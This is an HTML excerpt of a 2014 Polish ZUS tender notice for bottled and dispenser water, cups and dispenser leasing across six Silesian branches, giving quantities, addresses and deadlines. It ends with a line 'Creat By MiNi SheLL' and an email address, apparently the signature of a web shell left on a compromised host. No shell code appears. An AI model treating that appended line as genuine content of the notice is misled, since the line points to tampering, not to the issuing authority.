<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego w Bielsku-Białej, ul. Krasińskiego 34, w Centrum Zamówień Publicznych, piętro I, pok. 125..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2014 godzina 10:00, miejsce: W siedzibie Zamawiającego w Bielsku-Białej, ul. Krasińskiego 34, w Centrum Zamówień Publicznych, piętro I, pok. 125..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr 1 Dostawa wody mineralnej w butelkach PET 1,5 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dostawa jednorazowych kubków plastikowych o poj. 200 ml, dzierżawa dystrybutorów dla Oddziału ZUS w Bielsku-Białej wraz z podległymi jednostkami terenowymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1 Dostawa wody mineralnej w butelkach PET 1,5 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dostawa jednorazowych kubków plastikowych o poj. 200 ml, dzierżawa dystrybutorów dla Oddziału ZUS w Bielsku-Białej wraz z podległymi jednostkami terenowymi.

Ilość i miejsce dostawy:

1)Oddział ZUS w Bielsku - Białej, ul. Krasińskiego 34:   
 woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l) niegazowanej i gazowanej w butelkach PET o pojemności 1,5 l.   ok. 7.960 szt.,
 dostawa i zainstalowanie dystrybutorów - 4 szt.

2) Oddział ZUS w Bielsku-Białej, ul. Traugutta 2:
 dostawa i zainstalowanie dystrybutorów - 2 szt.

3) Inspektorat ZUS w Cieszynie, ul. Bielska 29: 
 dostawa i zainstalowanie dystrybutorów - 2 szt.

4) Inspektorat ZUS w Żywcu, ul. Piernikarska 2: 
 dostawa i zainstalowanie dystrybutorów - 2 szt.

Woda źródlana naturalna niegazowana (całkowita mineralizacja od 500mg/l) w butlach 18,9 l (+/- 0,2 l.) - 481 szt. oraz kubki plastikowe jednorazowe o poj. 200 ml - 227 op. ( po 100 sztuk w jednym opakowaniu) będą dostarczana do wszystkich ww. lokalizacji, w okresie letnim od czerwca do września, na podstawie złożonego zamówienia przez upoważnionego pracownika Zamawiającego.
Szczegółowy opis zamówienia stanowi załącznik nr 1 A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.10.00.00-0, 15.98.12.00-0, 15.98.10.00-8, 39.22.21.20-1, 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część nr 2 Dostawa wody źródlanej w butlach 18,9 l. (+/- 0,2 l.), dzierżawa dystrybutorów oraz dostawa jednorazowych kubków plastikowych o poj. 200 ml. dla Oddziału ZUS w Częstochowie wraz z podległymi jednostkami terenowymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 2 Dostawa wody źródlanej w butlach 18,9 l. (+/- 0,2 l.), dzierżawa dystrybutorów oraz dostawa jednorazowych kubków plastikowych o poj. 200 ml. dla Oddziału ZUS w Częstochowie wraz z podległymi jednostkami terenowymi

Ilość i miejsce dostawy:

1)Oddział ZUS w Częstochowie, ul. Dąbrowskiego 43/45:   

dostawa kubków plastikowych jednorazowych o poj. 200 ml. - 120 op. ( 100 szt. w jednym opakowaniu),
dostawa i zainstalowanie dystrybutorów - 14 szt.

2) Oddział ZUS w Częstochowie, ul. Okólna 17/19:
 dostawa i zainstalowanie dystrybutorów - 4 szt.

3) Inspektorat ZUS w Kłobucku, ul. Targowa 3 a: 
dostawa i zainstalowanie dystrybutorów - 2 szt.

4) Inspektorat ZUS w Lublińcu, ul. Oleska 26: 
dostawa i zainstalowanie dystrybutorów - 3 szt.

5) Inspektorat ZUS w Myszkowie, ul. Sikorskiego 57: 
dostawa i zainstalowanie dystrybutorów - 3 szt.

6) Biuro Terenowe ZUS w Koniecpolu, ul. Rynek 1: 
dostawa i zainstalowanie dystrybutorów - 2 szt.

Woda źródlana naturalna niegazowana (całkowita mineralizacja od 500mg/l) w butlach 18,9 l. (+/- 0,2 l.) - 900 szt.
Szczegółowy opis zamówienia stanowi załącznik nr 1 B do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.10.00.00-0, 15.98.10.00-8, 39.22.21.20-1, 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część nr 3    Dostawa wody mineralnej, w butelkach PET 0,5 l., 1,5 l., w butelkach szklanych 0,33 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dla Oddziału ZUS w Chorzowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 3    Dostawa wody mineralnej, w butelkach PET 0,5 l., 1,5 l., w butelkach szklanych 0,33 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dla Oddziału ZUS w Chorzowie

Ilość i miejsce dostawy:

1)Oddział ZUS w Chorzowie, ul. Gen. Henryka Dąbrowskiego 45 i ul. Lwowska 2:   

gazowana woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l)  w butelkach plastikowych typu PET o pojemności 1,5 l., pakowana w zgrzewkach  po 6 szt. -12 000 butelek.
niegazowana woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l)    w butelkach plastikowych typu PET o pojemności 1,5 l., pakowana w zgrzewkach po  6 szt. - 8 000 butelek.
gazowana woda    mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l)  w butelkach plastikowych typu PET o pojemności 0,5 l., w zgrzewkach min. 12 szt. - 1 100 butelek.
niegazowana woda  mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l)  w butelkach plastikowych typu PET o pojemności 0,5 l, w zgrzewkach  min. 12 szt. - 710 butelka.
niegazowana woda źródlana (całkowita mineralizacja od 500mg/l)  do dystrybutorów w butlach o pojemności 18,9 l. (+/-0,2 l.) - 228 butli.
gazowana i niegazowana woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l)w szklanych butelkach zamykanych zakrętkami o pojemności 0,33 l, w zgrzewkach min. 4 szt.  - 330 butelek.

Szczegółowy opis zamówienia stanowi załącznik nr 1 C do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.10.00.00-0, 15.98.12.00-0, 15.98.10.00-8, 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część nr 4 Dostawa wody mineralnej w butelkach PET  0,5 l., 1,5 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dzierżawa dystrybutorów dla Oddziału ZUS w Rybniku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 4 Dostawa wody mineralnej w butelkach PET  0,5 l., 1,5 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dzierżawa dystrybutorów dla Oddziału ZUS w Rybniku.

Ilość i miejsce dostawy:

woda źródlanej niskozmineralizowanej o ogólnej sumie składników mineralnych  od 273 mg/l dla pracowników o poj. min. 18,9 l. (+/- 0,2 l.) w ilości 800 szt. w okresie od 02.05.2014r. do 30.09.2014r.
-woda źródlanej niskozmineralizowanej o ogólnej sumie składników mineralnych od 273 mg/l dla pracowników i na Salę Obsługi Klienta o poj. min. 18,9 l. (+/- 0,2 l.) w ilości 280 szt. w okresie od 02.01.2015r. do 29.05.2015r
-woda mineralnej dla pracowników wg poniższego asortymentu w okresie od 02.05.2014r. do 30.09.2014r:
-woda mineralna niegazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe a 1,5 l. w ilości 762 szt.
-woda mineralna niegazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe a 0,5 l. w ilości 348 szt.
-woda mineralna gazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe  a 0,5 l. w ilości 600 szt.
-woda mineralnej dla pracowników wg poniższego asortymentu w okresie od 04.05.2015r. do 29.05.2015r:
-woda mineralna niegazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe a 1,5 l.  w ilości 162 szt.
-woda mineralna niegazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe a 0,5 l. w ilości 72 szt.
-woda mineralna gazowana średniozmineralizowana o ogólnej sumie składników mineralnych od 507 mg/l - butelki plastikowe  a 0,5 l. w ilości 120 szt.

dostawa i zainstalowanie dystrybutorów - 55 szt.( miejsca dostawy  zostaną uzgodnione z Zamawiającym po podpisaniu umowy) Wykonawca  zobowiązany jest do zainstalowania 23 szt. dystrybutorów w roku 2014  ( w okresie od 02.05.2014r. do 30.09.2014r.) oraz 32 szt. dystrybutorów w roku 2015  ( 9 szt. w okresie od 02.01.2015r. do 29.05.2015r i 23 szt. w okresie od 04.05.2015r. do 29.05.2015r) w miejscach użytkowych wskazanych przez Zamawiającego (Oddział ZUS w Rybniku i podległe Inspektoraty). 
Dystrybutory muszą umożliwiać praktyczne korzystanie z wody i w celu zapewnienia higieny i bezpieczeństwa użytkowania, posiadać możliwość zabezpieczenia przed rozlaniem wody na podłogę (odpowiednia rynienka lub kieszonka umieszczona pod kranikiem). Dystrybutory w ilości 9 szt., które zostaną zainstalowane w 2015 r. w okresie  od 02.01.2015r. do 29.05.2015 r. powinny posiadać podajniki do kubków.                                         


Szczegółowy opis zamówienia stanowi załącznik nr 1 D do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.10.00.00-0, 15.98.12.00-0, 15.98.10.00-8, 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część nr 5  Dostawa wody mineralnej w butelkach PET 0,5 l., 1,5 l.  dla Oddziału ZUS w Sosnowcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość i miejsce dostawy:

1)Oddział ZUS w Sosnowcu, ul. Partyzantów 1:   

woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l) niegazowana w butelkach PET o poj. 1,5 l., ilość: 7400
woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l) gazowana w butelkach PET o poj. 1,5 l., ilość: 7450
woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l) niegazowana w butelkach PET o poj. 0,5 l., ilość: 2500 szt.
woda mineralna średniozmineralizowana (całkowita mineralizacja od 500mg/l) gazowana w butelkach PET o poj. 0,5 l., ilość: 500 szt.

Szczegółowy opis zamówienia stanowi załącznik nr 1 E do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.10.00.00-0, 15.98.12.00-0, 15.98.10.00-8, 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część nr 6 Dostawa wody mineralnej w butelkach PET 0,33 l., 0,5 l., 1,5 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dzierżawy dystrybutorów dla Oddziału ZUS w Zabrzu wraz z podległymi jednostkami terenowymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 6 Dostawa wody mineralnej w butelkach PET 0,33 l., 0,5 l., 1,5 l., źródlanej w butlach 18,9 l. (+/- 0,2 l.), dzierżawy dystrybutorów dla Oddziału ZUS w Zabrzu wraz z podległymi jednostkami terenowymi.

Ilość i miejsce dostawy:

1)Oddział ZUS w Zabrzu, ul. Szczęść Boże 18:   

1 dystrybutor wody butlowej, ulokowany na Sali Obsługi Klienta, 
1 dystrybutor wody butlowej, ulokowany w Poczekalni przed Gabinetami Lekarskimi, 
wody mineralnej średniozmineralizowana o ogólnej sumie składników mineralnych od 500 mg/l  w butelkach PET 1,5 l. w ilości 6 729 sztuk (na podstawie przepisów BHP) dla potrzeb pracowników Zakładu   Ubezpieczeń Społecznych Oddział w Zabrzu - dostawy w okresie letnim, tj.: od 01.06.2014r. do 30.09.2014r., 
wody mineralnej średniozmineralizowana o ogólnej sumie składników mineralnych od 500 mg/l  w butelkach plastikowych o pojemności:  0,5 l. - woda mineralna gazowana w ilości 130 sztuk, 0,33 l. - woda mineralna niegazowana w ilości 130 sztuk,
naturalna woda źródlana niskozmineralizowana o ogólnej sumie składników mineralnych do 500 mg/l, o poj. min. 18,9 l. (+/- 0,2 l.) w ilości 120 szt. ( dostawa do miejsc, w których będą dystrybutory)

2)Inspektorat ZUS w Tarnowskich Górach przy ul. Górniczej 4-8: 
 1 dystrybutor wody butlowej, ulokowany na Sali Obsługi Klienta,
3)Biuro Terenowe ZUS w Bytomiu przy ul. Sądowej 8: 
 1 dystrybutor wody butlowej, ulokowany na Sali Obsługi Klienta,
4)Biuro Terenowe ZUS w Gliwicach przy ul. Pszczyńskiej 44A: 
 1 dystrybutor wody butlowej, ulokowany na Sali Obsługi Klienta,  

Szczegółowy opis zamówienia stanowi załącznik nr 1 F do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.10.00.00-0, 15.98.12.00-0, 15.98.10.00-8, 41.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com